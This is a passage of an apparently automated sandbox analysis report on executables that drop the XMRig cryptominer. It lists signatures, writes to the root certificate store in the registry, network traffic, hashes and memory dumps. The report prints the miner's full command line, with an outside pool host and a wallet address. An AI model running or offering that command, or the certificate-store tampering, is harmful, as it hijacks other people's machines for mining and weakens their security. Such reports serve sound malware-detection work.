a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
NL 23.62.61.185:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 185.61.62.23.in-addr.arpa udp
NL 23.62.61.185:443 www.bing.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1980-16-0x000002184BFA0000-0x000002184BFC0000-memory.dmp

memory/1980-17-0x000002184BFF0000-0x000002184C010000-memory.dmp

memory/1980-18-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-20-0x000002184C030000-0x000002184C050000-memory.dmp

memory/1980-19-0x000002184C010000-0x000002184C030000-memory.dmp

memory/1980-21-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-22-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-25-0x000002184C030000-0x000002184C050000-memory.dmp

memory/1980-24-0x000002184C010000-0x000002184C030000-memory.dmp

memory/1980-23-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-26-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-27-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-28-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-29-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-30-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-31-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-32-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-33-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-34-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-35-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-36-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-37-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-38-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-39-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-40-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-41-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-42-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-43-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-44-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-45-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-46-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-47-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-48-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-49-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-50-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-51-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-52-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-53-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-54-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-55-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-56-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-57-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-58-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-59-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-60-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-61-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-62-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-63-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-64-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-65-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-66-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-67-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-68-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-69-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-70-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-71-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-72-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-73-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-74-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-75-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-76-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-77-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-78-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-79-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-80-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-81-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-82-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-83-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

memory/1980-84-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2920-16-0x0000025CDD340000-0x0000025CDD360000-memory.dmp

memory/2920-17-0x0000025CDEB40000-0x0000025CDEB60000-memory.dmp

memory/2920-18-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-19-0x0000025CDEB60000-0x0000025CDEB80000-memory.dmp

memory/2920-20-0x0000025CDEB80000-0x0000025CDEBA0000-memory.dmp

memory/2920-21-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-22-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-23-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-24-0x0000025CDEB60000-0x0000025CDEB80000-memory.dmp

memory/2920-25-0x0000025CDEB80000-0x0000025CDEBA0000-memory.dmp

memory/2920-26-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-27-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-28-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-29-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-30-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-31-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-32-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-33-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-34-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-35-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-36-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-37-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-38-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-39-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-40-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-41-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-42-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-43-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-44-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-45-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-46-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-47-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-48-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-49-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-50-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-51-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-52-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-53-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-54-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-55-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-56-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-57-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-58-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-59-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-60-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-61-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-62-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-63-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-64-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-65-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-66-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-67-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-68-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-69-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-70-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-71-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-72-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-73-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-74-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-75-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

